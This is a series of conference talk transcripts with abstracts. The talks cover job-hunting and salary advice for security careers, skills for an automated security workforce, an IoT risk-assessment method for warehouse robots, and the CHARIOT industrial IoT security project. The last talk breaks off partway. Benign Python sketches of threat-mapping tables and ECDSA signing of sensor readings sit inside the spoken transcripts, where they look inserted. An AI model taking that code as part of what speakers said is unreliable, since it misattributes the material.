through how to write your best resume. Start. Please, please, please. Here's my name. Actually, with or without a name, here's the most important part. I'm a this and I want to be a that. This is the block. 
This is the bottom line up front. I'm this and I want to be a that. Do not assume that the person reading your resume has the time or the technical qualifications or that they're not totally fatigued out on resumes to know, to be able to look through your resume and know what do you do and what do you want to do? Hi, I'm a systems engineer looking to be a solutions architect. I am a developer looking to manage programs, just one or two sentences. Help me out. Then I know how to proceed with you. Then you're going to do your technical, put the technical in there, the technicals that you've used the tools, the software, the hardware that are chronological. People argue about the length of resumes. Obviously shorter is better. It's less to have to read, but don't feel like it has to be one or two pages. You know, we are reasonable. Frankly, if you're in the cleared space or if you would like to be in the cleared space, it's helpful to either mention that you do have it clearance and or that you are eligible and willing to get one. PDF is fine. If it used to be fine, it is fine now. Remember if no one was responding up to you to ping, send a message, send a little reminder, be patient. And customize each resume per the job within reason. Does my resume make sense? As your experience grows, it may become harder for whoever is looking at your resume to get to realize which thing you're trying to do. So on to the interview. Try to do a little research on the company up front. It doesn't have to be that big of a deal, but just, you know, don't be so, I'm interviewing somebody who's like, I can't even remember who I'm talking to. You know, do a little bit better than that. Do a little bit of research. Try to find a way when it makes sense to answer as many of the questions as you can in the form of a story. What's your strength? What's your weaknesses? You know, all those kind of questions. Well, funny you should ask. One time I was building a robot and it was supposed to cross the street, but it actually blew up in the middle of the street. And so I learned that in the future, you don't cross the red and blue wires and you always bring a fire extinguisher, whatever. You just revealed to me the way that you learn from mistakes, the way that you prepare to solve problems in the future. You invited me into a little bit about your problem solving skills and so forth. So look for a way. Think about it in advance. What are some stories that you can tell? You know, kind of about things that have occurred for you. Also this is where I'm going to ask you to give yourself a chance to be a real person and put the person on the other side of the table as a real person as well. They almost always say, go and make questions for us at the end, right? So hopefully they're not a grandstander and they've been trained properly how to interview and give you the opportunity to shine and not make it about them and all the things that they've done. However, make them into a person and they won't be ready for this. Say to the interviewer when they ask, do you have any questions? Yes, actually I do. When you were looking at coming to this company, did you have any reservations about working here and how did that turn out? Wow, what a question. That's going to tell you a lot. Maybe they're going to say, you know, actually my kid has soccer three times a week and I was concerned about the commute and turns out they gave me a chance to do this, this and this to make that better, right? 
They're going to make themselves into a person and they're going to help you envision being an actual person working there instead of being all technical. Other favorite questions? Yeah, actually tell me, I see you've been, how long have you been working here three years? Cool. I'm going to wait for it. What a revealing thing for them to have the opportunity to tell you what have they learned here because if they haven't learned anything, it's going to be very revealing, right? So I'm not telling you to trick them, right? This is a social thing. This is making them into a person. They're really going to tell you. I often liken interviewing to dating. I actually don't have any dating experience, but I imagine that if you went on a date and you sat down and you said, I love kids, I love traveling, I go to church every Sunday and none of those things are true. You have probably just guaranteed that that relationship isn't going to work out. So don't show up at the interview and be like, I love solving problems. I'm an independent worker. Actually I love working on teams. All these things that you're saying about yourself, if they're not true, you're hurting you and them, right? So make it real. And here's the thing, you might reveal something about yourself and then the interviewer might say, you know what? James, what you told me means that you won't be a good fit for this. But turns out you're a perfect fit for this other thing that we didn't even know we should be talking about, right? So if they're doing a good job, the more you tell them about the real you, the better off you both will end up. Okay, so really, really, really, really I want you to be yourself. I want you to be honest. My hair was blue at my last interview. It is what it is. It's okay to pivot. I mentioned that I was a software engineer and we're going to help desk, right? It's okay to change. It's okay. There are so many opportunities out there. It is okay to pivot. I want you to find your next best opportunity. I really, really do. I want you to be where you're happy and very comfortable. And I think there's enough opportunities out there for that to happen. So really, really, be who you are. Do what you love. So real quick, I think this is my last spot. Negotiating. People really, really struggle in this area. I have screwed up in this area. I have undersolded myself. I have. And I've seen others do it as well. Here's what's up. Do not tell anyone how much money you make. Don't do it. Hey, they shouldn't be asking. And every federally mandated ordinance in the US anyway says that they can't ask you. So I guess I should practice that a lot of you aren't in the US. Sorry, I, this is applied to the US. I don't know the laws everywhere, but I will say this, regardless of where you are, the amount of money that you currently make has absolutely nothing to do with the amount of money you should be making or could be making. Okay. Because it doesn't speak to your bonafide occupational qualifications or your education or your certifications or the most important thing that every single one of you has to offer is your willingness and your ability to do the job. Regardless of what you have done, right? What are you willing to do and what are you able to do? Right? What can you learn? You know what? I don't even know how to spell Python, but I don't have a script. I just proved to you that I could be a Python developer willing. I'm able. So please don't tell them what you make. 
Think about, and also answer, the question when they ask what you want to make, and think about how you're going to deliver that answer. What matters to you more than just your paycheck? Is it shares? Is it 401(k)? Is it flexibility? Is it the ability to go remote? Is it performance bonuses, incentive compensation? Think about the total package of things that matters to you in the long run. Is it the insurance premiums? Man, I'll tell you what. The difference, and I'm not going to dox anyone, between two paychecks at two different companies where the salaries were very similar but the premiums were significantly different: boy, that makes a huge difference. So okay, and that's pretty much it. So let's recap. Always be open. Be your own best advocate. I get it: descriptions suck. Sometimes so do resumes. Let's find a way to meet in the middle. Be exactly who you are. Be yourself. You are good enough. Notice how you're being treated all throughout your candidate experience. That's very, very telling. Remember that these challenges are like the ones that you will face as an engineer, right? Look at them that way. You can't make them go away, but you can hopefully beat them. Thank you, DEF CON. Thank you, Kathleen. And if there's a way for us to do questions and answers in Discord or something, I am always open. Thank you. Thanks so much, Kirsten. I really appreciate all of your great points. You've been just an amazing asset to the entire community. Yes, everyone can ask you questions in the Discord channel. And I'm sure you'll be hanging around the con throughout the entire weekend and can answer other questions. Please do connect with her. She's always open to answering questions. And be sure to follow us on Twitter at hackingcareer. And that's it for today. Thanks so much, everybody.
|
As if finding your next gig wasn't already a challenge, now we have to do it in the midst of a pandemic. Let's talk about the new hurdles, how to get around them and the classic fundamentals like searching, networking, and negotiating
|
10.5446/51581 (DOI)
|
So here we are at the end of the first day of the Career Hacking Village, and I hope everyone has had a great time. We were so thankful that one of our partners came up with this idea of looking at what the future of the workforce will be and how we can future-proof our careers. We're definitely in a time of a lot of change and a lot of uncertainty, and it is always good to be thinking about what the next steps are and what we can be doing now to future-proof our careers. I'd like to introduce Jenai Marinkovic, and she has some great thoughts for us to think about. Jenai? Hi, Kathleen. Thank you very much. I really appreciate you giving me the opportunity to talk about a topic that is near and dear to my heart. The title of today's lecture is future-proofing your career in the age of the intelligent ecosystem, and some of the skills that we're going to need to build up what we'll call an augmented workforce from the ground up. Just a little bit of background about myself. I'm a chief information security officer and chief technology officer for a company called Tiro Security. I've been doing cybersecurity for 20 years now, and I've been a CISO for the last seven or eight. I've worked in a multitude of different industries, including media, entertainment, live sports, and gaming. I've also worked in manufacturing, healthcare, and robotics. I've got extensive experience building cybersecurity capabilities from the ground up, everything from security architecture and engineering to forensics and defense. I've also had the opportunity to invent a cyber defense framework based on American football. I've worked for companies such as DirecTV, Electronic Arts, Beckman Coulter, and investigation firms like Kroll-O'Gara. We are in what's called the Fourth Industrial Revolution. What that is, it's this time marked by an interconnection of the physical, the biological, and the digital worlds. When these worlds integrate the way that they are today, it gives rise to what we call big bang disruptions and ultimately transforms entire systems. The accompanying pace of technological development is going to exert a profound change in the way that we live and the way that we work; it's going to impact all disciplines, all economies, and all industries. When these worlds mesh, you end up with what's called distributed thinking. That's where, if everything is hyper-instrumented with sensors, and the sensors have things like onboard artificial intelligence, and again, they're crossing multiple worlds, the digital, the biological, and the physical, you end up giving rise to this thing called distributed thinking. So what is an intelligent ecosystem? It's heavily instrumented sensor networks that are integrated across this mesh of all three worlds, the digital, the biological, and the physical networks. It's accessible via natural user interfaces, so think voice and gesture, and it leverages cognitive systems that ultimately make real-time decisions at the sensor level, and this all occurs across blockchain-enabled networks. With all of this, at the end of the day, all roads ultimately lead through cybersecurity. We have our work cut out for us. Attackers are better at adapting to, leveraging, and exploiting disruption. We operate in a world bound by rules; their limits, quite frankly, are their own creativity. And our ability to predict and prepare is more critical than ever, to deeply understand the forecasts and the trends that will mold and shape the world of tomorrow.
As cybersecurity professionals, quite frankly, we don't often fully understand how these near and long-term technology trends culminate. We don't think like world builders, we don't think in universes, and as a result we end up with these disjointed, unnatural approaches to cybersecurity design, from the cybersecurity worker's user experience to slow, debt-laden, friction-laden enterprise security architectures. Designing for cybersecurity in the future requires a willingness for us to explore how these technical trends are going to manifest in this future world. What are some of the iterative steps that we can take that will help us both operate in this world comprised of intelligent ecosystems and protect and defend it? Since user-centric design starts with the user, it's time that we consider the cybersecurity professional and our user experience first. There's a wonderful quote from Accenture: in the future, people don't want more technology in our products and services; we actually want technology that is more human. Technology-driven interactions are creating and expanding a technology identity for the consumer. This living foundation of knowledge will be key not only to us understanding the next-generation consumers and, quite frankly, security users, but to delivering rich, individualized experiences based on relationships in this post-digital age. One of the quotes that I like is from Steve Jobs at a conference called D5, where he said, I just want Star Trek. Give me Star Trek. Why is that? Well, it's because technology experiences in Star Trek are natural and oftentimes invisible and transparent. Tech is built into the fabric of the ecosystem, and the ultimate trajectory is building these humanized technologies, ecosystems that sense, that feel, that think, intelligent ecosystems. But to engage in predicting the future, we need to take a look at how all of this is ultimately going to impact us. These next-generation security systems are going to leverage human-centered designs that intersect empathy and creativity with consideration for us as the end user, and they're going to be accessed via deeply personalized and anticipatory interfaces using, as I mentioned before, natural language and voice. And they are going to culminate in role-based and purpose-based digital assistants that are ultimately going to help navigate employees through decision-making processes and the explosion of data in these intelligent ecosystems. As AI and cognitive solutions evolve in sophistication, we too as cybersecurity professionals have got to figure out how that's going to affect our jobs. How is it going to affect our work? What is our work going to look like in the future when the majority of our workload is automated? What are the skills that are necessary to operate in these blended worlds where security professionals are working alongside assistants or robotics? We're going to have to learn how to operate faster. We're going to have to be capable of applying new skill sets rapidly. There's going to be a change in the way that we deal with our skills, and we're going to have to learn a set of skills that places higher value on our people skills, our business intelligence, our independent thinking, innovation, and especially creativity. So, building the next-generation security worker. 
So in this next section, we're going to talk about the six sets of skills that I wanted to delve into. I'm sure many other lectures have covered the traditional cybersecurity skills that you need in order to move on to your next role, or even some of the human skills such as presentation and empathy and so forth. I wanted to take a little bit of a different tack and focus on skills that I believe security people are going to need if you're operating in a world where much of our work has already been automated away. So I broke the skills into two different areas: one is STEM skills, and the other is what we'll call human skills. The first one is artificial intelligence. This is very meaningful to me; in fact, I felt so strongly about this that when I was working at a design firm as their CTO, we designed a set of artificial intelligence training for everybody in the company. As cybersecurity professionals, we're dealing with a couple of things here. One, you're expected to protect and defend systems that have machine learning built into them. From the security architecture and design phase, to the way that we instrument and monitor attacks against systems that have machine learning built into them, to the way that you do digital forensics within these systems, you have to have a foundational knowledge and understanding of AI in order to be able to do your future job. The other is that with the augmented workforce, you're working alongside digital assistants. We already see this in industries such as supply chain and customer care, where people have digital assistants or in some cases robotics working alongside them and taking over, through automation, a lot of the day-to-day activities. So in building and designing these systems, it's really key and critical for security users to understand AI, not just at a basic level, but I would say ultimately through the mid-level. The next is biological systems. We already mentioned earlier that there's this intersection between the physical, the digital, and the biological worlds, everything that comprises the fourth industrial revolution. And so we're going to be working in worlds where you're expected to design the cybersecurity controls in embedded biological devices. For example, think of embedded medical tattoos. Think of ingestible robots, for example medications that have nanobots and so forth built into them. We're going to be expected to design security into those and into other biointerfaces and wearables. Understanding what the impact to the human can be if those systems get compromised is going to be key. But it's actually a little bit more than that. The world's been around for what, four and a half billion years, and biological systems have had the chance to evolve. I already mentioned earlier that we as security people oftentimes don't think in ecosystems; we don't think in world building. And so if you want insight into the way that you can approach building security holistically, you can look at biological systems. A couple of examples: the human immune system. There are several books out there that talk about human immune system architecture, and when we look at the way that we design security systems, we oftentimes don't do it very holistically. 
So if you look at the construction of a human immune system and you correlate that, there's a lot of insight that you can get from there. A couple of quick examples: it's frictionless and transparent. When your immune system goes off, it's because there's something bad happening. You don't wake up in the morning thinking about your immune system. Yet those are the actions that we expect of end users when we design security systems for them. So the future design of cybersecurity systems needs to be more transparent, with a lot less friction for the end user. There's insight in biological systems in terms of the way that animals communicate with each other, and you can take insight from there. When you look at everything from terrestrial ecosystem design, you can take inspiration from that in terms of the way that you approach the design of cybersecurity. So, both because we're going to be operating and designing cybersecurity into biological systems and because there is insight that can be gained from biological systems, I highly recommend becoming more competent in biological systems; it's a skill that we're going to see cybersecurity people need. User experience design. I talked a little bit earlier about what the user experience currently looks like for a cybersecurity professional. We've all experienced it. It doesn't matter what your role is, you're in a hundred applications, plus the context switching that we have to do is astronomical. It adds a lot of friction to the process, it adds a lot of time to the process. And when you're dealing with attacks that operate rapidly, and again, attacks that can cross multiple worlds, then time is absolutely of the essence. And yet, when we look at the way that security architectures are designed for us as end users, they're problematic. Oftentimes you have to click through multiple screens in order to be able to get anything done. They are not designed with the care with which you design interfaces for, say, consumers. And so, since the future of our applications is going to have these voice interfaces and digital assistants built into them, understanding how to design user experiences is important to us as security professionals. But it's also important for end users. When we think about what we ask of end users, we don't oftentimes understand the full experience that they have as part of their journey, and the things that we're asking them to do as part of their day-to-day activities or within the applications themselves oftentimes don't offer the best user experience for that individual. And so understanding how to do UX or user experience design, understanding how to map out user journeys and build security into them, is going to be an absolutely key skill. Creativity and design. Creativity is still one of those skills where humans outperform machines. And so our ability to think outside of the box, our ability to apply creative processes to things, is going to be critical, especially in the world of cybersecurity. We're going to see attacks and we're going to see breaches unlike anything we've seen in the past, which means that we're going to have to leverage different types of experiences and different ways of doing things, far different than anything that we've done in the past. 
And so a proper education and training in the world of design, and a proper education and training in the world of creativity and things like design thinking, I think are skills that we're going to have to see not only in STEM careers, but definitely in the world of cybersecurity. We've already mentioned that attackers are really bound only by the limits of their creativity, which means that we need to meet creativity with creativity. Storytelling. One of the key things that we're going to have to build as a workforce is our ability to communicate. Security people are oftentimes very good at communicating with other technical people. But when we get outside of the technical realm and we start interfacing with our colleagues, with users, with our management, with the board of directors, we think we are communicating one way; unfortunately, our audience is interpreting it a very different way. And so understanding how to storytell is going to be one of the key skills in terms of communication and, quite frankly, persuasion. Negotiation skills are also predicated on your ability to storytell. Humans have been storytelling as a way to communicate information since the beginning of time. Being able to reach into some of those ancient skills and understand how to communicate these very difficult topics using mechanisms such as storytelling, understanding things like the hormones behind storytelling, the way that you tell specific stories in order to elicit certain reactions that actually have hormonal responses and get the person to either feel there's a call to action or to empathize with you as the storyteller, all of that is predicated on our ability to tell a good story. So storytelling is absolutely one of the key skills that we're going to have to build. And empathy. Empathy is, I think, an oftentimes underrated skill, because we often believe that you either have it or you don't. Being able to build a bond with our users, in fact key to storytelling, is our ability to be empathic. And so if we're expecting our users, our colleagues, our management to understand what we're trying to communicate, then we also have to be able to look at the world through their eyes. We need to look at the world through the lens of where they're coming from. Proper user experience design is predicated on empathy; creative design is predicated on empathy. So everything that we do in the world of cybersecurity when we're trying to communicate out and get people to align with us or take specific actions depends on our understanding of how to look at the world through their lens, unbiased, and work through designing solutions that ultimately allow all of us to work together. So I wanted to end on this, and that's a call to action. As security professionals, one of the things that we really need to focus on is demanding that the industry as a whole start looking at security experience design end to end and holistically. Everything from the way that we interface with applications, so that instead of having to interface with a hundred different applications, you're working with digital assistants that are capable of automating a lot of the work and then presenting the information to us in a way that ultimately makes sense and makes our jobs easier, is absolutely key. 
Making the people who design for us start thinking about our lives holistically, end to end, and not just trying to solve this one problem with this one piece of technology, but understanding the stressors that security people deal with and what their lives look like in the context of trying to do this work, is absolutely key. And so I wanted to have a call to action that we demand more from our vendors: when they're designing for us, they should design as if they're designing for a consumer. When we look at things like digital assistants and the way that digital assistants have been built for consumers, the idea that that type of experience can't be built for cybersecurity needs to stop. We need to start demanding proper UX design, that things like natural user interfaces and futuristic technology get embedded into our user experience, so that at the end of the day we're able to deliver the protection and defense services to our companies and to the people that we're responsible for protecting. And I wanted to thank you for giving me the opportunity to talk about intelligent ecosystems and some of the human and STEM-based skills that I predict we're going to need in order to operate in this future world. Thank you very much, and enjoy the rest of the conference. And I thank you so much. That was really inspiring and really turned our heads around; we tend to push a lot on you need this certification, you need to know this language, you need to know sort of hard-science kinds of skills. And some of the things that we've been talking about over the last year or so have been the skills that people learn when they're volunteering at conferences: learning how to better communicate, learning how to be empathetic. The way you practice your empathy is by being a volunteer and dealing with people from different cultures and different backgrounds, and understanding that you do have the capacity to be empathetic, you just need to learn how to use it and constantly practice it. So these are really great pieces of information. I know a lot of people will be talking to our career coaches today and tomorrow, and I think this is something that we can really touch on as far as what other skills everyone should be looking at as they develop their career. So thank you so much for this, and everyone have a great evening, and we will see you all tomorrow at the Career Hacking Village. Thank you. Thank you.
|
We have entered the 4th industrial revolution, a time marked by the interconnection of hyper-instrumented physical, biological, and digital worlds. The accompanying pace of technological development will exert profound changes in the way people live and work, impacting all disciplines, economies, and industries. Preparing the cybersecurity workforce for the changes that will reframe their careers requires insight and a vision of our possible future. Next-generation security professionals will both leverage and work alongside purpose-based digital assistants to help navigate the explosion of data created by intelligent ecosystems. These virtual assistants will replace current knowledge management platforms/intranets, dashboards, and manage any security process that can be automated. As machine learning and cognitive solutions evolve in sophistication, security teams must re-examine how they organize work, design jobs, and plan for future growth. Let's futurecast near term technological trends and identify the concrete steps all security professionals need in the Age of the Intelligent Ecosystem and the Augmented Workforce.
|
10.5446/51303 (DOI)
|
Okay, so our first paper is on risk assessment in IoT, a case study of a collaborative robot system, presented by Salim Kaeda, researcher at the University of Grenoble Alpes in France. Hi, hi everybody. So my name is Salim Shahidaf, from the VERIMAG laboratory of the University of Grenoble Alpes. In my work, I work on the specification, design and verification of cyber-physical systems and IoT systems. I also work on the security of these systems. So in this work, we propose an approach for risk assessment in IoT systems, and after that we apply this approach to a collaborative robot system. First, I would like to thank all the authors who participated in this work, from the Robotnik Automation company and from Airbus Defence and Space. So I think you can share the video. Hello, everyone. This work is funded by the Brain-IoT project, which aims to develop a framework for reducing the effort of developing, validating, operating and monitoring IoT-based systems. In this work, we propose an approach for risk assessment in IoT systems. Then we apply our approach to analyse risk in a collaborative robot system. First, I would like to thank all the partners and authors who participated in this work, from the Robotnik, Airbus and IMAXA companies. This is the plan of our presentation. We first start with the state of the art of existing standards and methods for security risk assessment. Then we introduce our approach and we present our case study of a robot system for supporting the movement of loads in a warehouse. In the third part of our presentation, we detail the main steps of our approach and their application to our case study. Finally, we give some conclusions and future work. An IoT system includes a lot of devices such as sensors, actuators and other physical entities. These devices can be connected using several communication technologies such as RFID, Bluetooth, Wi-Fi and LoRa. The large number of devices and communication protocols that can be used in IoT systems can increase the vulnerabilities and the attacks that can exploit these vulnerabilities. In this work, we propose a risk assessment methodology to identify and mitigate the risks. We aim to build secure IoT systems that ensure security requirements. There are a lot of common standards from international organizations such as ISO, NIST and E3A. These standards provide generic guidelines for the security of systems. There are also some standards proposed by ITU-T, ISO and E3A that deal with some specific issues related to IoT security. In this study, we consider these standards, especially ISO 27002, which gives general guidance to ensure the main security objectives. There are also a lot of existing methods for security risk assessment. For example, the EBIOS method from the National Cybersecurity Agency of France, which allows risk assessment in information systems. The CRAMM method from the Central Computer and Telecommunications Agency in the United Kingdom, which allows qualitative risk assessment. The AURA method, which supports the NIST SP 800-30 standard. The MEHARI method from the French Information Security Club, which supports ISO 27005. However, these methods are generic and do not consider the complexity of IoT systems. In this work, we propose a new method adapted to IoT-based systems. In our approach, we start by identifying the assets of the system based on a reference IoT domain model. In the second step, we specify threats on the assets based on the common threats database from the EBIOS method. 
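As a rough illustration of these first two steps (asset identification and threat association), the sketch below models assets by device type and looks up candidate threats from a small catalogue. This is not the authors' tooling; the asset names, threat entries, and catalogue structure are hypothetical placeholders, loosely inspired by the EBIOS-style categories mentioned in the talk.

```python
from dataclasses import dataclass, field
from enum import Enum

class DeviceKind(Enum):
    SENSOR = "sensor"
    ACTUATOR = "actuator"
    TAG = "tag"

@dataclass
class Asset:
    name: str
    kind: DeviceKind
    threats: list[str] = field(default_factory=list)

# Hypothetical threat catalogue keyed by device kind (illustrative only).
THREAT_CATALOGUE = {
    DeviceKind.SENSOR: ["eavesdropping on readings", "spoofed measurements"],
    DeviceKind.ACTUATOR: ["unauthorized actions", "compromise of functions"],
    DeviceKind.TAG: ["cloning", "unauthorized reading"],
}

def identify_threats(assets: list[Asset]) -> None:
    """Step 2: attach candidate threats to each asset from the catalogue."""
    for asset in assets:
        asset.threats = list(THREAT_CATALOGUE.get(asset.kind, []))

# Step 1: a hypothetical asset inventory for the warehouse robot system.
assets = [
    Asset("robot lidar", DeviceKind.SENSOR),
    Asset("door PLC", DeviceKind.ACTUATOR),
    Asset("pallet RFID tag", DeviceKind.TAG),
]
identify_threats(assets)
for a in assets:
    print(a.name, "->", a.threats)
```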
In the third step, we rely on ISO 27002 to derive the security objectives from the threats. Finally, we give security requirements that implement the defined security objectives. Our approach is iterative, so the security requirements can be revised after the refinement of system assets. Also, the results of each step should be checked with the customer and a security expert. We apply our approach to a collaborative robot system from the Robotnik Automation company in Spain. In this system, a fleet of robots is deployed to support the movement of loads in a warehouse. Robots move items from the unload area to the storage area, passing through an automatic door that separates the two zones. This system is managed automatically, without the intervention of a human operator. To properly identify all the assets of the system, we refer to the IoT domain model proposed by Heller. The IoT domain model defines the main concepts and the relationships in order to avoid any ambiguity. Here we present some important concepts. On the left, a thing is the combination of a physical entity together with its digital representation, called a virtual entity. There are two types of virtual entity: a passive digital artefact, which corresponds to a digital representation of a physical entity stored in a database or similar form, and an active digital artefact, which corresponds to any type of active software program, agent or embedded application. On the right, a device is hardware with computing and network capabilities. A device can be a sensor, which allows to monitor a physical entity; an actuator, which allows to act on a physical entity; or a tag, which allows to identify a physical entity and can be read by sensors. The domain model also describes other concepts such as users and resources. Here are examples of assets from our robot system. The system includes different types of devices such as sensors, here for example three robot sensors. We also have examples of actuators such as the door PLC, and other types of components. For the identification of threats associated with the defined assets, we refer to the EBIOS threats database. In the EBIOS database, threats are classified into eight categories, and they can be caused by two factors: environmental factors such as natural events, or human factors such as unauthorized actions or compromise of functions. In this table, we show examples of threats associated with the assets defined in the previous step. This table is completed with our partner from the Robotnik Automation company and then validated and approved with security experts. In the last step of our approach, we rely on the ISO 27002 generic list to specify the security objectives needed to protect the system assets against the identified threats. Here in this table, we give some examples of security objectives and we map each security objective to the covered threats. The security objectives should cover all the identified threats. After the specification of security objectives, we define security requirements. In this table, each security objective leads to the implementation of one or more technical requirements. The requirements should be approved by security experts; then appropriate countermeasures can be deployed to ensure the security requirements. In this work, we have presented a security risk assessment method for IoT systems and applied this method to a robotic service system. 
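To make the last two steps concrete, here is a minimal sketch of how the threat/objective/requirement tables could be represented and checked so that every identified threat is covered by at least one security objective, as the method requires. The objective and requirement names are invented for illustration and do not come from the paper's actual tables.

```python
# Hypothetical mapping tables; names are illustrative, not from the paper.
threats = {"eavesdropping on readings", "unauthorized actions", "compromise of functions"}

objectives_to_threats = {
    "encrypt sensor communications": {"eavesdropping on readings"},
    "enforce access control": {"unauthorized actions", "compromise of functions"},
}

objectives_to_requirements = {
    "encrypt sensor communications": ["use TLS between robots and the fleet server"],
    "enforce access control": ["authenticate operators",
                               "restrict door PLC commands to the fleet manager"],
}

def uncovered_threats(threats, objectives_to_threats):
    """Return threats not covered by any security objective (should be empty)."""
    covered = set().union(*objectives_to_threats.values())
    return threats - covered

missing = uncovered_threats(threats, objectives_to_threats)
if missing:
    print("Revise objectives, uncovered threats:", missing)
else:
    for objective, requirements in objectives_to_requirements.items():
        print(objective, "->", requirements)
```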
Among the advantages of our approach: it considers the IoT domain model to identify system assets, it considers standards to specify security requirements, and it is iterative and considers evolution and change in the system. We have applied our approach to a collaborative robot system and also to a water management system. In future work, we plan to apply our method to other systems. We also plan to support our approach with tools. Thank you. Thank you so much. Are there some questions for Salim from the audience? I would like to ask you something, Salim. You mentioned... do you have a question, Rosaria? Yes, I have a couple of questions. I will let Konstantinos, could you please unmute yourself and ask the question? No, hello. It was not actually a question. It was us raising the hand for the next presentation. No question. Sorry for this. It's a Kariya. You can unmute yourself. Hello. Hi, Salim. Thank you so much for the presentation. It's interesting. Actually, I have one question. At the beginning, you presented some state of the art and some standardization work. My question: you selected one of those standards. Did you use some criteria, or why did you use ISO exactly and not other standards for risk management or risk assessment? Sorry. Was it a choice, or was it due to specific requirements? Yes. Thank you for the question. In this work, we have done the state of the art of all the existing standards about the generic security of systems and also the security of IoT systems. Here, with the help of some security experts in IoT systems, we have extracted the relevant and adapted standards for the security of IoT systems. For each standard, we have extracted the relevant parts which are adapted to IoT systems. Okay. Thank you. Just another question, not really a question about the presentation: this study you did with the other experts, is it included in the paper? Yes. Okay. Thank you. We have experts in security from Airbus Defence and Space. Okay. Thank you. We have other experts who helped us with this work. Yeah. No. Sorry. My question was more about whether the studies are included in the paper. Yes. Okay. Thank you so much. Thanks. Okay.
|
Security is one of the crucial challenges in the design and development of IoT applications. This paper presents an approach that focuses on existing security standards to evaluate and analyse the potential risks faced by IoT systems. It begins by identifying system assets and their associated vulnerabilities and threats. A list of security objectives and technical requirements is then defined to mitigate the risks and build a secure and safe system. We use our approach to assess risks in the robotic system for supporting the movement of loads in a warehouse.
|
10.5446/51304 (DOI)
|
Okay, Konstantinos will present to us the integrated solution for industrial IoT data security in the CHARIOT solution. Konstantinos Loupos is from INLECOM Innovation. Okay, great. Thank you so much. Okay, thank you, a big thanks to the Eclipse Foundation for the organization of this event. I think there will be a lot of interesting discussions and presentations from the participants. I will give you the presentation about the CHARIOT project; it's about an integrated solution for industrial data security. Let me introduce myself first and where I come from. So I'm Konstantinos Loupos, I'm the head of the R&D programme in INLECOM related to IoT systems and ICT development in general. INLECOM is an SME with offices in Athens, Brussels, London, and Ireland, and we are particularly active in research projects. We have a series of around 22 to 25 projects running right now. So it's a long experience that is very much aligned to modern IoT solutions and ICT developments in general. So, I will start with a quick overview of the situation in IoT. What are the industrial challenges right now? I'm sure that we are well aware of the situation, but let me make a summary, and with this I will drive the discussion into what CHARIOT develops and how this aligns to its scope. As we all know, and we can see in a graph here by Gartner, there will be around 75 billion IoT connected devices worldwide by 2025. So it's a big number to consider, and this number is expected to increase even further after that time. And the security of these IoT devices, and with IoT devices we can include the whole spectrum of IoT, needs to be considered seriously. This is what has actually been driving CHARIOT as a scope and as a project. We have seen very recently a lot of security breaches in various instances, and they are increasing and expected to increase further in the next years. There is a lot of research in the background, and there are a lot of commercial activities as well, to protect and strengthen devices against these attacks. But still, as IoT devices increase, we should expect that security breaches will also be aligned with this trend. And there are obviously some tasks that we need to do to protect the device and finally the user and personal data; all these are points of attention recently. So this is the origin, the idea and the scope of the project, and the reason for its rise. CHARIOT is one of a series of projects funded by the IoT-03 call of 2017 on IoT integration and platforms. It's a research and innovation project with funding of around 5 million euros, and it has a duration of 36 months. It started on the first of January 2018 and is expected to end at the end of this year. We consider IoT, of course, as I said, but we are focusing on industrial systems; I will explain later what the business case is here. We also consider cyber-physical systems and important and critical infrastructures, and systems in these infrastructures whose failure or malfunction can result in harm, injury or even death to people, damage to property, or impact on the environment. In other words, actions that can modify the original purpose of the IoT device. These can comprise hardware, software and infrastructure with human aspects, all the points around the IoT and the actual industrial infrastructure. 
So the security of the data coming and going, and of the objects involved in the networks, infrastructures and systems inside this environment, has a dominant role in this project and will continue to in the next years. Recognizing all these security threats, their broad aspect and their potential to rise even further has led the technical developments of CHARIOT into providing a more secure platform for data integration in industrial environments. So, roughly speaking, on the objectives of the project: we are developing a logical framework for the design and operation of secure and safe IoT applications. We are designing a cognitive IoT architecture and platform, which is what we call the CHARIOT platform, so this is an intelligent layer with safety behaviour. We are also developing a runtime IoT privacy, security and safety supervision engine that monitors the activities of the data inside the networks. And we also apply, deploy and validate the developed technologies in three living labs, what we call pilots: trains in Italy, a smart building in an IBM campus in Ireland, and the Athens International Airport. So these are the three use cases that we are focusing on; we apply the technologies there and we are currently at the validation stage, and you will see results in my next slides. So, first of all, let's have a look at the robust technical outcomes that CHARIOT provides. We can start from the IoT devices lifecycle management, which is supported by blockchain technologies based on a PKI for sensor and gateway authentication. We are embedding keys, private and public keys, in sensor and gateway controllers, whatever we have in the industrial environment. We have a blockchain both at the gateway and server level and also at the sensor level in each of the installations. And to support this, we are also developing some prototype sensors having the required capabilities to support blockchain. What we have found recently, through our research and deployments in this project, is that many IoT devices used in these infrastructures, for instance, you can imagine a smoke detector in an airport, or a smart door or something like that, do not have the required capacity in terms of processing power to execute code and allow us to implement encryption between the devices, etc. There are some challenges there, that's why we had to adapt to this, and that's why we have developed a series of prototype sensors supporting some processing capabilities, to be able to support this point. So, we have incorporated blockchain-backed encryption between the devices and all network endpoints, being sensors, gateways, the local network, etc. This is supported by a mobile application for sensor provisioning in the IoT network, and a blockchain-based state management for the sensors, meaning decommissioning, detection of faulty or compromised sensors, etc. A second important layer of CHARIOT is the IoT firmware development and deployment. We all know that at some point we need to trust the firmware that is running on the actual IoT devices. In this direction, we do a complete series of developments, starting from the software development, the writing of the code actually, up to the deployment of this firmware as an executable, as a binary file, to the device. 
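As a rough sketch of what PKI-based sensor-to-gateway authentication can look like (independent of CHARIOT's actual implementation), the example below uses the third-party Python `cryptography` package: the sensor signs each reading with its embedded private key, and the gateway verifies it against the public key registered for that sensor, for instance at provisioning time. The key names and the registry structure are assumptions for illustration; a blockchain-backed deployment would look up the public key from the ledger rather than a local dictionary.

```python
# Illustrative sketch only; requires the third-party "cryptography" package.
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.exceptions import InvalidSignature

# Provisioning: generate a key pair for the sensor; the public key would be
# registered (e.g. on the ledger), the private key embedded in the sensor.
sensor_private_key = ec.generate_private_key(ec.SECP256R1())
registry = {"sensor-42": sensor_private_key.public_key()}  # hypothetical registry

def sensor_send(reading: bytes) -> tuple[bytes, bytes]:
    """Sensor side: sign the reading with the embedded private key."""
    signature = sensor_private_key.sign(reading, ec.ECDSA(hashes.SHA256()))
    return reading, signature

def gateway_accept(sensor_id: str, reading: bytes, signature: bytes) -> bool:
    """Gateway side: verify the signature against the registered public key."""
    try:
        registry[sensor_id].verify(signature, reading, ec.ECDSA(hashes.SHA256()))
        return True
    except (KeyError, InvalidSignature):
        return False

reading, sig = sensor_send(b'{"temp": 21.5}')
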